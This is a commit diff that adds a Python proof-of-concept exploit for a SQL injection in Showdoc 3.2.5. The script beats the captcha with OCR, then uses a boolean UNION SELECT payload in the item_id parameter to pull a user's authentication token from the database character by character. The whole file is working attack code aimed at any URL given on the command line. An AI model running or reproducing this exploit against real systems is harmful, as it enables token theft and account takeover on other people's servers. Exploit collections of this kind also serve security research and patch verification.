first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/showdoc/3.2.5-sqli/poc.py
+++ b/showdoc/3.2.5-sqli/poc.py
@@ -0,0 +1,86 @@
+import argparse
+import ddddocr
+import requests
+import onnxruntime
+from urllib.parse import urljoin
+
+
+onnxruntime.set_default_logger_severity(3)
+table = '0123456789abcdef'
+proxies = {'http': 'http://127.0.0.1:8085'}
+ocr = ddddocr.DdddOcr()
+ocr.set_ranges(table)
+
+
+class RetryException(Exception):
+    pass
+
+
+def retry_when_failed(func):
+    def retry_func(*args, **kwargs):
+        while True:
+            try:
+                return func(*args, **kwargs)
+            except RetryException:
+                continue
+            except Exception as e:
+                raise e
+
+    return retry_func
+
+
+def generate_captcha(base: str):
+    data = requests.get(f"{base}?s=/api/common/createCaptcha").json()
+    captcha_id = data['data']['captcha_id']
+
+    response = requests.get(f'{base}?s=/api/common/showCaptcha&captcha_id={captcha_id}')
+    data = response.content
+    result = ocr.classification(data)
+    return captcha_id, result
+
+
+@retry_when_failed
+def exploit_one(base: str, current: str, ch: str) -> str:
+    captcha_id, captcha_text = generate_captcha(base)
+    data = requests.get(base, params={
+        's': '/api/item/pwd',
+        'page_id': '0',
+        'password': '1',
+        'captcha_id': captcha_id,
+        'captcha': captcha_text,
+        'item_id': f"aa') UNION SELECT 1,1,1,1,1,(SELECT 1 FROM user_token WHERE uid = 1 AND token LIKE '{current}{ch}%' LIMIT 1),1,1,1,1,1,1 FROM user_token; -- "
+    }).json()
+
+    if data['error_code'] == 0:
+        return ch
+    elif data['error_code'] == 10010:
+        return ''
+    elif data['error_code'] == 10206:
+        raise RetryException()
+    else:
+        print(f'error: {data!r}')
+        raise Exception('unknown exception')
+
+
+def main():
+    parser = argparse.ArgumentParser(description='Showdoc 3.2.5 SQL injection')
+    parser.add_argument('-u', '--url', type=str, required=True)
+
+    args = parser.parse_args()
+    target = urljoin(args.url, '/server/index.php')
+    res = ''
+    for i in range(64):
+        r = ''
+        for ch in list(table):
+            r = exploit_one(target, res, ch)
+            if r:
+                res += ch
+                break
+
+        print(f'Current result: {res}')
+        if not r:
+            break
+
+
+if __name__ == '__main__':
+    main()